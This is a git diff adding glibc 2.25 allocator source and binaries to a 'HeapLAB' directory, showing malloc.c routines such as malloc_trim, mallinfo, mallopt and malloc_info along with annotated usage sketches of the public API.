+         we can move to the next aligned spot -- we've allocated enough
+         total room so that this is always possible.  */
+      brk = (char *) mem2chunk (((unsigned long) (m + alignment - 1)) &
+                                - ((signed long) alignment));
+      if ((unsigned long) (brk - (char *) (p)) < MINSIZE)
+        brk += alignment;
+
+      newp = (mchunkptr) brk;
+      leadsize = brk - (char *) (p);
+      newsize = chunksize (p) - leadsize;
+
+      /* For mmapped chunks, just adjust offset */
+      if (chunk_is_mmapped (p))
+        {
+          newp->prev_size = p->prev_size + leadsize;
+          set_head (newp, newsize | IS_MMAPPED);
+          return chunk2mem (newp);
+        }
+
+      /* Otherwise, give back leader, use the rest */
+      set_head (newp, newsize | PREV_INUSE |
+                (av != &main_arena ? NON_MAIN_ARENA : 0));
+      set_inuse_bit_at_offset (newp, newsize);
+      set_head_size (p, leadsize | (av != &main_arena ? NON_MAIN_ARENA : 0));
+      _int_free (av, p, 1);
+      p = newp;
+
+      assert (newsize >= nb &&
+              (((unsigned long) (chunk2mem (p))) % alignment) == 0);
+    }
+
+  /* Also give back spare room at the end */
+  if (!chunk_is_mmapped (p))
+    {
+      size = chunksize (p);
+      if ((unsigned long) (size) > (unsigned long) (nb + MINSIZE))
+        {
+          remainder_size = size - nb;
+          remainder = chunk_at_offset (p, nb);
+          set_head (remainder, remainder_size | PREV_INUSE |
+                    (av != &main_arena ? NON_MAIN_ARENA : 0));
+          set_head_size (p, nb);
+          _int_free (av, remainder, 1);
+        }
+    }
+
+  check_inuse_chunk (av, p);
+  return chunk2mem (p);
+}
+
+
+/*
+   ------------------------------ malloc_trim ------------------------------
+ */
+
+static int
+mtrim (mstate av, size_t pad)
+{
+  /* Don't touch corrupt arenas.  */
+  if (arena_is_corrupt (av))
+    return 0;
+
+  /* Ensure initialization/consolidation */
+  malloc_consolidate (av);
+
+  const size_t ps = GLRO (dl_pagesize);
+  int psindex = bin_index (ps);
+  const size_t psm1 = ps - 1;
+
+  int result = 0;
+  for (int i = 1; i < NBINS; ++i)
+    if (i == 1 || i >= psindex)
+      {
+        mbinptr bin = bin_at (av, i);
+
+        for (mchunkptr p = last (bin); p != bin; p = p->bk)
+          {
+            INTERNAL_SIZE_T size = chunksize (p);
+
+            if (size > psm1 + sizeof (struct malloc_chunk))
+              {
+                /* See whether the chunk contains at least one unused page.  */
+                char *paligned_mem = (char *) (((uintptr_t) p
+                                                + sizeof (struct malloc_chunk)
+                                                + psm1) & ~psm1);
+
+                assert ((char *) chunk2mem (p) + 4 * SIZE_SZ <= paligned_mem);
+                assert ((char *) p + size > paligned_mem);
+
+                /* This is the size we could potentially free.  */
+                size -= paligned_mem - (char *) p;
+
+                if (size > psm1)
+                  {
+#if MALLOC_DEBUG
+                    /* When debugging we simulate destroying the memory
+                       content.  */
+                    memset (paligned_mem, 0x89, size & ~psm1);
+#endif
+                    __madvise (paligned_mem, size & ~psm1, MADV_DONTNEED);
+
+                    result = 1;
+                  }
+              }
+          }
+      }
+
+#ifndef MORECORE_CANNOT_TRIM
+  return result | (av == &main_arena ? systrim (pad, av) : 0);
+
+#else
+  return result;
+#endif
+}
+
+
+int
+__malloc_trim (size_t s)
+{
+  int result = 0;
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  mstate ar_ptr = &main_arena;
+  do
+    {
+      (void) mutex_lock (&ar_ptr->mutex);
+      result |= mtrim (ar_ptr, s);
+      (void) mutex_unlock (&ar_ptr->mutex);
+
+      ar_ptr = ar_ptr->next;
+    }
+  while (ar_ptr != &main_arena);
+
+  return result;
+}
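+
+/*
+  Illustrative usage sketch (not part of glibc): the public entry point
+  above walks every arena; a return value of 1 means at least one page
+  was handed back to the kernel (via sbrk and/or madvise):
+
+    #include <malloc.h>
+    #include <stdio.h>
+    #include <stdlib.h>
+
+    int main (void)
+    {
+      void *p = malloc (100 * 1024);
+      free (p);                      // leaves a large free region behind
+      if (malloc_trim (0))
+        puts ("some free memory was returned to the system");
+      return 0;
+    }
+*/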
+
+
+/*
+   ------------------------- malloc_usable_size -------------------------
+ */
+
+static size_t
+musable (void *mem)
+{
+  mchunkptr p;
+  if (mem != 0)
+    {
+      p = mem2chunk (mem);
+
+      if (__builtin_expect (using_malloc_checking == 1, 0))
+        return malloc_check_get_size (p);
+
+      if (chunk_is_mmapped (p))
+	{
+	  if (DUMPED_MAIN_ARENA_CHUNK (p))
+	    return chunksize (p) - SIZE_SZ;
+	  else
+	    return chunksize (p) - 2 * SIZE_SZ;
+	}
+      else if (inuse (p))
+        return chunksize (p) - SIZE_SZ;
+    }
+  return 0;
+}
+
+
+size_t
+__malloc_usable_size (void *m)
+{
+  size_t result;
+
+  result = musable (m);
+  return result;
+}
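+
+/*
+  Illustrative usage sketch (not part of glibc): because requests are
+  padded to a whole, aligned chunk, the value reported by musable() is
+  usually somewhat larger than what was asked for:
+
+    #include <malloc.h>
+    #include <stdio.h>
+    #include <stdlib.h>
+
+    int main (void)
+    {
+      void *p = malloc (100);
+      printf ("requested 100, usable %zu\n", malloc_usable_size (p));
+      free (p);
+      return 0;
+    }
+*/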
+
+/*
+   ------------------------------ mallinfo ------------------------------
+   Accumulate malloc statistics for arena AV into M.
+ */
+
+static void
+int_mallinfo (mstate av, struct mallinfo *m)
+{
+  size_t i;
+  mbinptr b;
+  mchunkptr p;
+  INTERNAL_SIZE_T avail;
+  INTERNAL_SIZE_T fastavail;
+  int nblocks;
+  int nfastblocks;
+
+  /* Ensure initialization */
+  if (av->top == 0)
+    malloc_consolidate (av);
+
+  check_malloc_state (av);
+
+  /* Account for top */
+  avail = chunksize (av->top);
+  nblocks = 1;  /* top always exists */
+
+  /* traverse fastbins */
+  nfastblocks = 0;
+  fastavail = 0;
+
+  for (i = 0; i < NFASTBINS; ++i)
+    {
+      for (p = fastbin (av, i); p != 0; p = p->fd)
+        {
+          ++nfastblocks;
+          fastavail += chunksize (p);
+        }
+    }
+
+  avail += fastavail;
+
+  /* traverse regular bins */
+  for (i = 1; i < NBINS; ++i)
+    {
+      b = bin_at (av, i);
+      for (p = last (b); p != b; p = p->bk)
+        {
+          ++nblocks;
+          avail += chunksize (p);
+        }
+    }
+
+  m->smblks += nfastblocks;
+  m->ordblks += nblocks;
+  m->fordblks += avail;
+  m->uordblks += av->system_mem - avail;
+  m->arena += av->system_mem;
+  m->fsmblks += fastavail;
+  if (av == &main_arena)
+    {
+      m->hblks = mp_.n_mmaps;
+      m->hblkhd = mp_.mmapped_mem;
+      m->usmblks = 0;
+      m->keepcost = chunksize (av->top);
+    }
+}
+
+
+struct mallinfo
+__libc_mallinfo (void)
+{
+  struct mallinfo m;
+  mstate ar_ptr;
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  memset (&m, 0, sizeof (m));
+  ar_ptr = &main_arena;
+  do
+    {
+      (void) mutex_lock (&ar_ptr->mutex);
+      int_mallinfo (ar_ptr, &m);
+      (void) mutex_unlock (&ar_ptr->mutex);
+
+      ar_ptr = ar_ptr->next;
+    }
+  while (ar_ptr != &main_arena);
+
+  return m;
+}
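+
+/*
+  Illustrative usage sketch (not part of glibc): the struct is returned by
+  value after every arena has been folded into it; uordblks and fordblks
+  give the in-use and free byte counts (all fields are plain ints):
+
+    #include <malloc.h>
+    #include <stdio.h>
+    #include <stdlib.h>
+
+    int main (void)
+    {
+      void *p = malloc (1000);
+      struct mallinfo mi = mallinfo ();
+      printf ("arena=%d in use=%d free=%d\n",
+              mi.arena, mi.uordblks, mi.fordblks);
+      free (p);
+      return 0;
+    }
+*/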
+
+/*
+   ------------------------------ malloc_stats ------------------------------
+ */
+
+void
+__malloc_stats (void)
+{
+  int i;
+  mstate ar_ptr;
+  unsigned int in_use_b = mp_.mmapped_mem, system_b = in_use_b;
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+  _IO_flockfile (stderr);
+  int old_flags2 = ((_IO_FILE *) stderr)->_flags2;
+  ((_IO_FILE *) stderr)->_flags2 |= _IO_FLAGS2_NOTCANCEL;
+  for (i = 0, ar_ptr = &main_arena;; i++)
+    {
+      struct mallinfo mi;
+
+      memset (&mi, 0, sizeof (mi));
+      (void) mutex_lock (&ar_ptr->mutex);
+      int_mallinfo (ar_ptr, &mi);
+      fprintf (stderr, "Arena %d:\n", i);
+      fprintf (stderr, "system bytes     = %10u\n", (unsigned int) mi.arena);
+      fprintf (stderr, "in use bytes     = %10u\n", (unsigned int) mi.uordblks);
+#if MALLOC_DEBUG > 1
+      if (i > 0)
+        dump_heap (heap_for_ptr (top (ar_ptr)));
+#endif
+      system_b += mi.arena;
+      in_use_b += mi.uordblks;
+      (void) mutex_unlock (&ar_ptr->mutex);
+      ar_ptr = ar_ptr->next;
+      if (ar_ptr == &main_arena)
+        break;
+    }
+  fprintf (stderr, "Total (incl. mmap):\n");
+  fprintf (stderr, "system bytes     = %10u\n", system_b);
+  fprintf (stderr, "in use bytes     = %10u\n", in_use_b);
+  fprintf (stderr, "max mmap regions = %10u\n", (unsigned int) mp_.max_n_mmaps);
+  fprintf (stderr, "max mmap bytes   = %10lu\n",
+           (unsigned long) mp_.max_mmapped_mem);
+  ((_IO_FILE *) stderr)->_flags2 |= old_flags2;
+  _IO_funlockfile (stderr);
+}
+
+
+/*
+   ------------------------------ mallopt ------------------------------
+ */
+
+int
+__libc_mallopt (int param_number, int value)
+{
+  mstate av = &main_arena;
+  int res = 1;
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+  (void) mutex_lock (&av->mutex);
+  /* Ensure initialization/consolidation */
+  malloc_consolidate (av);
+
+  LIBC_PROBE (memory_mallopt, 2, param_number, value);
+
+  switch (param_number)
+    {
+    case M_MXFAST:
+      if (value >= 0 && value <= MAX_FAST_SIZE)
+        {
+          LIBC_PROBE (memory_mallopt_mxfast, 2, value, get_max_fast ());
+          set_max_fast (value);
+        }
+      else
+        res = 0;
+      break;
+
+    case M_TRIM_THRESHOLD:
+      LIBC_PROBE (memory_mallopt_trim_threshold, 3, value,
+                  mp_.trim_threshold, mp_.no_dyn_threshold);
+      mp_.trim_threshold = value;
+      mp_.no_dyn_threshold = 1;
+      break;
+
+    case M_TOP_PAD:
+      LIBC_PROBE (memory_mallopt_top_pad, 3, value,
+                  mp_.top_pad, mp_.no_dyn_threshold);
+      mp_.top_pad = value;
+      mp_.no_dyn_threshold = 1;
+      break;
+
+    case M_MMAP_THRESHOLD:
+      /* Forbid setting the threshold too high. */
+      if ((unsigned long) value > HEAP_MAX_SIZE / 2)
+        res = 0;
+      else
+        {
+          LIBC_PROBE (memory_mallopt_mmap_threshold, 3, value,
+                      mp_.mmap_threshold, mp_.no_dyn_threshold);
+          mp_.mmap_threshold = value;
+          mp_.no_dyn_threshold = 1;
+        }
+      break;
+
+    case M_MMAP_MAX:
+      LIBC_PROBE (memory_mallopt_mmap_max, 3, value,
+                  mp_.n_mmaps_max, mp_.no_dyn_threshold);
+      mp_.n_mmaps_max = value;
+      mp_.no_dyn_threshold = 1;
+      break;
+
+    case M_CHECK_ACTION:
+      LIBC_PROBE (memory_mallopt_check_action, 2, value, check_action);
+      check_action = value;
+      break;
+
+    case M_PERTURB:
+      LIBC_PROBE (memory_mallopt_perturb, 2, value, perturb_byte);
+      perturb_byte = value;
+      break;
+
+    case M_ARENA_TEST:
+      if (value > 0)
+        {
+          LIBC_PROBE (memory_mallopt_arena_test, 2, value, mp_.arena_test);
+          mp_.arena_test = value;
+        }
+      break;
+
+    case M_ARENA_MAX:
+      if (value > 0)
+        {
+          LIBC_PROBE (memory_mallopt_arena_max, 2, value, mp_.arena_max);
+          mp_.arena_max = value;
+        }
+      break;
+    }
+  (void) mutex_unlock (&av->mutex);
+  return res;
+}
+libc_hidden_def (__libc_mallopt)
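+
+/*
+  Illustrative usage sketch (not part of glibc): the parameters handled
+  above are tuned through the public mallopt() interface, e.g. disabling
+  fastbins entirely or padding sbrk requests:
+
+    #include <malloc.h>
+    #include <stdlib.h>
+
+    int main (void)
+    {
+      mallopt (M_MXFAST, 0);          // no chunk sizes are treated as "fast"
+      mallopt (M_TOP_PAD, 1 << 20);   // ask for 1 MiB of extra top padding
+      void *p = malloc (32);          // when freed, this no longer goes to a fastbin
+      free (p);
+      return 0;
+    }
+*/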
+
+
+/*
+   -------------------- Alternative MORECORE functions --------------------
+ */
+
+
+/*
+   General Requirements for MORECORE.
+
+   The MORECORE function must have the following properties:
+
+   If MORECORE_CONTIGUOUS is false:
+
+ * MORECORE must allocate in multiples of pagesize. It will
+      only be called with arguments that are multiples of pagesize.
+
+ * MORECORE(0) must return an address that is at least
+      MALLOC_ALIGNMENT aligned. (Page-aligning always suffices.)
+
+   else (i.e. If MORECORE_CONTIGUOUS is true):
+
+ * Consecutive calls to MORECORE with positive arguments
+      return increasing addresses, indicating that space has been
+      contiguously extended.
+
+ * MORECORE need not allocate in multiples of pagesize.
+      Calls to MORECORE need not have args of multiples of pagesize.
+
+ * MORECORE need not page-align.
+
+   In either case:
+
+ * MORECORE may allocate more memory than requested. (Or even less,
+      but this will generally result in a malloc failure.)
+
+ * MORECORE must not allocate memory when given argument zero, but
+      instead return one past the end address of memory from previous
+      nonzero call. This malloc does NOT call MORECORE(0)
+      until at least one call with positive arguments is made, so
+      the initial value returned is not important.
+
+ * Even though consecutive calls to MORECORE need not return contiguous
+      addresses, it must be OK for malloc'ed chunks to span multiple
+      regions in those cases where they do happen to be contiguous.
+
+ * MORECORE need not handle negative arguments -- it may instead
+      just return MORECORE_FAILURE when given negative arguments.
+      Negative arguments are always multiples of pagesize. MORECORE
+      must not misinterpret negative args as large positive unsigned
+      args. You can suppress all such calls from even occurring by defining
+      MORECORE_CANNOT_TRIM.
+
+   There is some variation across systems about the type of the
+   argument to sbrk/MORECORE. If size_t is unsigned, then it cannot
+   actually be size_t, because sbrk supports negative args, so it is
+   normally the signed type of the same width as size_t (sometimes
+   declared as "intptr_t", and sometimes "ptrdiff_t").  It doesn't much
+   matter though. Internally, we use "long" as arguments, which should
+   work across all reasonable possibilities.
+
+   Additionally, if MORECORE ever returns failure for a positive
+   request, then mmap is used as a noncontiguous system allocator. This
+   is a useful backup strategy for systems with holes in address spaces
+   -- in this case sbrk cannot contiguously expand the heap, but mmap
+   may be able to map noncontiguous space.
+
+   If you'd like mmap to ALWAYS be used, you can define MORECORE to be
+   a function that always returns MORECORE_FAILURE.
+
+   If you are using this malloc with something other than sbrk (or its
+   emulation) to supply memory regions, you probably want to set
+   MORECORE_CONTIGUOUS as false.  As an example, here is a custom
+   allocator kindly contributed for pre-OSX macOS.  It uses virtually
+   but not necessarily physically contiguous non-paged memory (locked
+   in, present and won't get swapped out).  You can use it by
+   uncommenting this section, adding some #includes, and setting up the
+   appropriate defines above:
+
+ *#define MORECORE osMoreCore
+ *#define MORECORE_CONTIGUOUS 0
+
+   There is also a shutdown routine that should somehow be called for
+   cleanup upon program exit.
+
+ *#define MAX_POOL_ENTRIES 100
+ *#define MINIMUM_MORECORE_SIZE  (64 * 1024)
+   static int next_os_pool;
+   void *our_os_pools[MAX_POOL_ENTRIES];
+
+   void *osMoreCore(int size)
+   {
+    void *ptr = 0;
+    static void *sbrk_top = 0;
+
+    if (size > 0)
+    {
+      if (size < MINIMUM_MORECORE_SIZE)
+         size = MINIMUM_MORECORE_SIZE;
+      if (CurrentExecutionLevel() == kTaskLevel)
+         ptr = PoolAllocateResident(size + RM_PAGE_SIZE, 0);
+      if (ptr == 0)
+      {
+        return (void *) MORECORE_FAILURE;
+      }
+      // save ptrs so they can be freed during cleanup
+      our_os_pools[next_os_pool] = ptr;
+      next_os_pool++;
+      ptr = (void *) ((((unsigned long) ptr) + RM_PAGE_MASK) & ~RM_PAGE_MASK);
+      sbrk_top = (char *) ptr + size;
+      return ptr;
+    }
+    else if (size < 0)
+    {
+      // we don't currently support shrink behavior
+      return (void *) MORECORE_FAILURE;
+    }
+    else
+    {
+      return sbrk_top;
+    }
+   }
+
+   // cleanup any allocated memory pools
+   // called as last thing before shutting down driver
+
+   void osCleanupMem(void)
+   {
+    void **ptr;
+
+    for (ptr = our_os_pools; ptr < &our_os_pools[MAX_POOL_ENTRIES]; ptr++)
+      if (*ptr)
+      {
+         PoolDeallocate(*ptr);
+         *ptr = 0;
+      }
+   }
+
+ */
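+
+/*
+  Illustrative sketch (not part of glibc): as noted above, defining
+  MORECORE to always fail forces mmap to be used for every region.  At
+  run time the same effect can be had through the __morecore hook that
+  these glibc versions still export from <malloc.h> (an assumption worth
+  checking elsewhere, since the hook was removed in later releases):
+
+    #include <malloc.h>
+    #include <stddef.h>
+
+    static void *never_morecore (ptrdiff_t increment)
+    {
+      return NULL;   // report failure; sysmalloc then falls back to mmap
+    }
+
+    // before the first allocation:  __morecore = never_morecore;
+*/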
+
+
+/* Helper code.  */
+
+extern char **__libc_argv attribute_hidden;
+
+static void
+malloc_printerr (int action, const char *str, void *ptr, mstate ar_ptr)
+{
+  /* Avoid using this arena in future.  We do not attempt to synchronize this
+     with anything else because we minimally want to ensure that __libc_message
+     gets its resources safely without stumbling on the current corruption.  */
+  if (ar_ptr)
+    set_arena_corrupt (ar_ptr);
+
+  if ((action & 5) == 5)
+    __libc_message (action & 2, "%s\n", str);
+  else if (action & 1)
+    {
+      char buf[2 * sizeof (uintptr_t) + 1];
+
+      buf[sizeof (buf) - 1] = '\0';
+      char *cp = _itoa_word ((uintptr_t) ptr, &buf[sizeof (buf) - 1], 16, 0);
+      while (cp > buf)
+        *--cp = '0';
+
+      __libc_message (action & 2, "*** Error in `%s': %s: 0x%s ***\n",
+                      __libc_argv[0] ? : "<unknown>", str, cp);
+    }
+  else if (action & 2)
+    abort ();
+}
+
+/* We need a wrapper function for one of the additions of POSIX.  */
+int
+__posix_memalign (void **memptr, size_t alignment, size_t size)
+{
+  void *mem;
+
+  /* Test whether the SIZE argument is valid.  It must be a power of
+     two multiple of sizeof (void *).  */
+  if (alignment % sizeof (void *) != 0
+      || !powerof2 (alignment / sizeof (void *))
+      || alignment == 0)
+    return EINVAL;
+
+
+  void *address = RETURN_ADDRESS (0);
+  mem = _mid_memalign (alignment, size, address);
+
+  if (mem != NULL)
+    {
+      *memptr = mem;
+      return 0;
+    }
+
+  return ENOMEM;
+}
+weak_alias (__posix_memalign, posix_memalign)
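+
+/*
+  Illustrative usage sketch (not part of glibc): the alignment must be a
+  power-of-two multiple of sizeof (void *), exactly as checked above;
+  anything else yields EINVAL without touching *memptr:
+
+    #include <stdlib.h>
+    #include <errno.h>
+
+    void *buf = NULL;
+    int rc = posix_memalign (&buf, 64, 1000);   // ok: 64 is a power of two
+    if (rc == 0)
+      free (buf);
+    rc = posix_memalign (&buf, 48, 1000);       // EINVAL: 48 is not a power of two
+*/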
+
+
+int
+__malloc_info (int options, FILE *fp)
+{
+  /* For now, at least.  */
+  if (options != 0)
+    return EINVAL;
+
+  int n = 0;
+  size_t total_nblocks = 0;
+  size_t total_nfastblocks = 0;
+  size_t total_avail = 0;
+  size_t total_fastavail = 0;
+  size_t total_system = 0;
+  size_t total_max_system = 0;
+  size_t total_aspace = 0;
+  size_t total_aspace_mprotect = 0;
+
+
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  fputs ("<malloc version=\"1\">\n", fp);
+
+  /* Iterate over all arenas currently in use.  */
+  mstate ar_ptr = &main_arena;
+  do
+    {
+      fprintf (fp, "<heap nr=\"%d\">\n<sizes>\n", n++);
+
+      size_t nblocks = 0;
+      size_t nfastblocks = 0;
+      size_t avail = 0;
+      size_t fastavail = 0;
+      struct
+      {
+	size_t from;
+	size_t to;
+	size_t total;
+	size_t count;
+      } sizes[NFASTBINS + NBINS - 1];
+#define nsizes (sizeof (sizes) / sizeof (sizes[0]))
+
+      mutex_lock (&ar_ptr->mutex);
+
+      for (size_t i = 0; i < NFASTBINS; ++i)
+	{
+	  mchunkptr p = fastbin (ar_ptr, i);
+	  if (p != NULL)
+	    {
+	      size_t nthissize = 0;
+	      size_t thissize = chunksize (p);
+
+	      while (p != NULL)
+		{
+		  ++nthissize;
+		  p = p->fd;
+		}
+
+	      fastavail += nthissize * thissize;
+	      nfastblocks += nthissize;
+	      sizes[i].from = thissize - (MALLOC_ALIGNMENT - 1);
+	      sizes[i].to = thissize;
+	      sizes[i].count = nthissize;
+	    }
+	  else
+	    sizes[i].from = sizes[i].to = sizes[i].count = 0;
+
+	  sizes[i].total = sizes[i].count * sizes[i].to;
+	}
+
+
+      mbinptr bin;
+      struct malloc_chunk *r;
+
+      for (size_t i = 1; i < NBINS; ++i)
+	{
+	  bin = bin_at (ar_ptr, i);
+	  r = bin->fd;
+	  sizes[NFASTBINS - 1 + i].from = ~((size_t) 0);
+	  sizes[NFASTBINS - 1 + i].to = sizes[NFASTBINS - 1 + i].total
+					  = sizes[NFASTBINS - 1 + i].count = 0;
+
+	  if (r != NULL)
+	    while (r != bin)
+	      {
+		++sizes[NFASTBINS - 1 + i].count;
+		sizes[NFASTBINS - 1 + i].total += r->size;
+		sizes[NFASTBINS - 1 + i].from
+		  = MIN (sizes[NFASTBINS - 1 + i].from, r->size);
+		sizes[NFASTBINS - 1 + i].to = MAX (sizes[NFASTBINS - 1 + i].to,
+						   r->size);
+
+		r = r->fd;
+	      }
+
+	  if (sizes[NFASTBINS - 1 + i].count == 0)
+	    sizes[NFASTBINS - 1 + i].from = 0;
+	  nblocks += sizes[NFASTBINS - 1 + i].count;
+	  avail += sizes[NFASTBINS - 1 + i].total;
+	}
+
+      mutex_unlock (&ar_ptr->mutex);
+
+      total_nfastblocks += nfastblocks;
+      total_fastavail += fastavail;
+
+      total_nblocks += nblocks;
+      total_avail += avail;
+
+      for (size_t i = 0; i < nsizes; ++i)
+	if (sizes[i].count != 0 && i != NFASTBINS)
+	  fprintf (fp, "\
+  <size from=\"%zu\" to=\"%zu\" total=\"%zu\" count=\"%zu\"/>\n",
+		   sizes[i].from, sizes[i].to, sizes[i].total, sizes[i].count);
+
+      if (sizes[NFASTBINS].count != 0)
+	fprintf (fp, "\
+  <unsorted from=\"%zu\" to=\"%zu\" total=\"%zu\" count=\"%zu\"/>\n",
+		 sizes[NFASTBINS].from, sizes[NFASTBINS].to,
+		 sizes[NFASTBINS].total, sizes[NFASTBINS].count);
+
+      total_system += ar_ptr->system_mem;
+      total_max_system += ar_ptr->max_system_mem;
+
+      fprintf (fp,
+	       "</sizes>\n<total type=\"fast\" count=\"%zu\" size=\"%zu\"/>\n"
+	       "<total type=\"rest\" count=\"%zu\" size=\"%zu\"/>\n"
+	       "<system type=\"current\" size=\"%zu\"/>\n"
+	       "<system type=\"max\" size=\"%zu\"/>\n",
+	       nfastblocks, fastavail, nblocks, avail,
+	       ar_ptr->system_mem, ar_ptr->max_system_mem);
+
+      if (ar_ptr != &main_arena)
+	{
+	  heap_info *heap = heap_for_ptr (top (ar_ptr));
+	  fprintf (fp,
+		   "<aspace type=\"total\" size=\"%zu\"/>\n"
+		   "<aspace type=\"mprotect\" size=\"%zu\"/>\n",
+		   heap->size, heap->mprotect_size);
+	  total_aspace += heap->size;
+	  total_aspace_mprotect += heap->mprotect_size;
+	}
+      else
+	{
+	  fprintf (fp,
+		   "<aspace type=\"total\" size=\"%zu\"/>\n"
+		   "<aspace type=\"mprotect\" size=\"%zu\"/>\n",
+		   ar_ptr->system_mem, ar_ptr->system_mem);
+	  total_aspace += ar_ptr->system_mem;
+	  total_aspace_mprotect += ar_ptr->system_mem;
+	}
+
+      fputs ("</heap>\n", fp);
+      ar_ptr = ar_ptr->next;
+    }
+  while (ar_ptr != &main_arena);
+
+  fprintf (fp,
+	   "<total type=\"fast\" count=\"%zu\" size=\"%zu\"/>\n"
+	   "<total type=\"rest\" count=\"%zu\" size=\"%zu\"/>\n"
+	   "<total type=\"mmap\" count=\"%d\" size=\"%zu\"/>\n"
+	   "<system type=\"current\" size=\"%zu\"/>\n"
+	   "<system type=\"max\" size=\"%zu\"/>\n"
+	   "<aspace type=\"total\" size=\"%zu\"/>\n"
+	   "<aspace type=\"mprotect\" size=\"%zu\"/>\n"
+	   "</malloc>\n",
+	   total_nfastblocks, total_fastavail, total_nblocks, total_avail,
+	   mp_.n_mmaps, mp_.mmapped_mem,
+	   total_system, total_max_system,
+	   total_aspace, total_aspace_mprotect);
+
+  return 0;
+}
+weak_alias (__malloc_info, malloc_info)
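+
+/*
+  Illustrative usage sketch (not part of glibc): malloc_info() streams the
+  XML document assembled above; options must be 0 for now, and the output
+  goes to the given stdio stream:
+
+    #include <malloc.h>
+    #include <stdio.h>
+    #include <stdlib.h>
+
+    int main (void)
+    {
+      void *p = malloc (100);
+      malloc_info (0, stdout);   // prints <malloc version="1"> ... up to the closing tag
+      free (p);
+      return 0;
+    }
+*/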
+
+
+strong_alias (__libc_calloc, __calloc) weak_alias (__libc_calloc, calloc)
+strong_alias (__libc_free, __cfree) weak_alias (__libc_free, cfree)
+strong_alias (__libc_free, __free) strong_alias (__libc_free, free)
+strong_alias (__libc_malloc, __malloc) strong_alias (__libc_malloc, malloc)
+strong_alias (__libc_memalign, __memalign)
+weak_alias (__libc_memalign, memalign)
+strong_alias (__libc_realloc, __realloc) strong_alias (__libc_realloc, realloc)
+strong_alias (__libc_valloc, __valloc) weak_alias (__libc_valloc, valloc)
+strong_alias (__libc_pvalloc, __pvalloc) weak_alias (__libc_pvalloc, pvalloc)
+strong_alias (__libc_mallinfo, __mallinfo)
+weak_alias (__libc_mallinfo, mallinfo)
+strong_alias (__libc_mallopt, __mallopt) weak_alias (__libc_mallopt, mallopt)
+
+weak_alias (__malloc_stats, malloc_stats)
+weak_alias (__malloc_usable_size, malloc_usable_size)
+weak_alias (__malloc_trim, malloc_trim)
+weak_alias (__malloc_get_state, malloc_get_state)
+weak_alias (__malloc_set_state, malloc_set_state)
+
+
+/* ------------------------------------------------------------
+   History:
+
+   [see ftp://g.oswego.edu/pub/misc/malloc.c for the history of dlmalloc]
+
+ */
+/*
+ * Local variables:
+ * c-basic-offset: 2
+ * End:
+ */
diff --git a/HeapLAB/.glibc/glibc_2.25/ld-2.25.so b/HeapLAB/.glibc/glibc_2.25/ld-2.25.so
new file mode 100755
index 0000000..867a795
Binary files /dev/null and b/HeapLAB/.glibc/glibc_2.25/ld-2.25.so differ
diff --git a/HeapLAB/.glibc/glibc_2.25/ld.so.2 b/HeapLAB/.glibc/glibc_2.25/ld.so.2
new file mode 120000
index 0000000..84b9e91
--- /dev/null
+++ b/HeapLAB/.glibc/glibc_2.25/ld.so.2
@@ -0,0 +1 @@
+ld-2.25.so
\ No newline at end of file
diff --git a/HeapLAB/.glibc/glibc_2.25/libc-2.25.so b/HeapLAB/.glibc/glibc_2.25/libc-2.25.so
new file mode 100755
index 0000000..f750818
Binary files /dev/null and b/HeapLAB/.glibc/glibc_2.25/libc-2.25.so differ
diff --git a/HeapLAB/.glibc/glibc_2.25/libc.so.6 b/HeapLAB/.glibc/glibc_2.25/libc.so.6
new file mode 120000
index 0000000..676bb4d
--- /dev/null
+++ b/HeapLAB/.glibc/glibc_2.25/libc.so.6
@@ -0,0 +1 @@
+libc-2.25.so
\ No newline at end of file
diff --git a/HeapLAB/.glibc/glibc_2.25/malloc/malloc.c b/HeapLAB/.glibc/glibc_2.25/malloc/malloc.c
new file mode 100644
index 0000000..4885793
--- /dev/null
+++ b/HeapLAB/.glibc/glibc_2.25/malloc/malloc.c
@@ -0,0 +1,5318 @@
+/* Malloc implementation for multiple threads without lock contention.
+   Copyright (C) 1996-2017 Free Software Foundation, Inc.
+   This file is part of the GNU C Library.
+   Contributed by Wolfram Gloger <wg@malloc.de>
+   and Doug Lea <dl@cs.oswego.edu>, 2001.
+
+   The GNU C Library is free software; you can redistribute it and/or
+   modify it under the terms of the GNU Lesser General Public License as
+   published by the Free Software Foundation; either version 2.1 of the
+   License, or (at your option) any later version.
+
+   The GNU C Library is distributed in the hope that it will be useful,
+   but WITHOUT ANY WARRANTY; without even the implied warranty of
+   MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
+   Lesser General Public License for more details.
+
+   You should have received a copy of the GNU Lesser General Public
+   License along with the GNU C Library; see the file COPYING.LIB.  If
+   not, see <http://www.gnu.org/licenses/>.  */
+
+/*
+  This is a version (aka ptmalloc2) of malloc/free/realloc written by
+  Doug Lea and adapted to multiple threads/arenas by Wolfram Gloger.
+
+  There have been substantial changes made after the integration into
+  glibc in all parts of the code.  Do not look for much commonality
+  with the ptmalloc2 version.
+
+* Version ptmalloc2-20011215
+  based on:
+  VERSION 2.7.0 Sun Mar 11 14:14:06 2001  Doug Lea  (dl at gee)
+
+* Quickstart
+
+  In order to compile this implementation, a Makefile is provided with
+  the ptmalloc2 distribution, which has pre-defined targets for some
+  popular systems (e.g. "make posix" for Posix threads).  All that is
+  typically required with regard to compiler flags is the selection of
+  the thread package via defining one out of USE_PTHREADS, USE_THR or
+  USE_SPROC.  Check the thread-m.h file for what effects this has.
+  Many/most systems will additionally require USE_TSD_DATA_HACK to be
+  defined, so this is the default for "make posix".
+
+* Why use this malloc?
+
+  This is not the fastest, most space-conserving, most portable, or
+  most tunable malloc ever written. However, it is among the fastest
+  while also being among the most space-conserving, portable and tunable.
+  Consistent balance across these factors results in a good general-purpose
+  allocator for malloc-intensive programs.
+
+  The main properties of the algorithms are:
+  * For large (>= 512 bytes) requests, it is a pure best-fit allocator,
+    with ties normally decided via FIFO (i.e. least recently used).
+  * For small (<= 64 bytes by default) requests, it is a caching
+    allocator, that maintains pools of quickly recycled chunks.
+  * In between, and for combinations of large and small requests, it does
+    the best it can trying to meet both goals at once.
+  * For very large requests (>= 128KB by default), it relies on system
+    memory mapping facilities, if supported.
+
+  For a longer but slightly out of date high-level description, see
+     http://gee.cs.oswego.edu/dl/html/malloc.html
+
+  You may already be using, by default, a C library containing a malloc
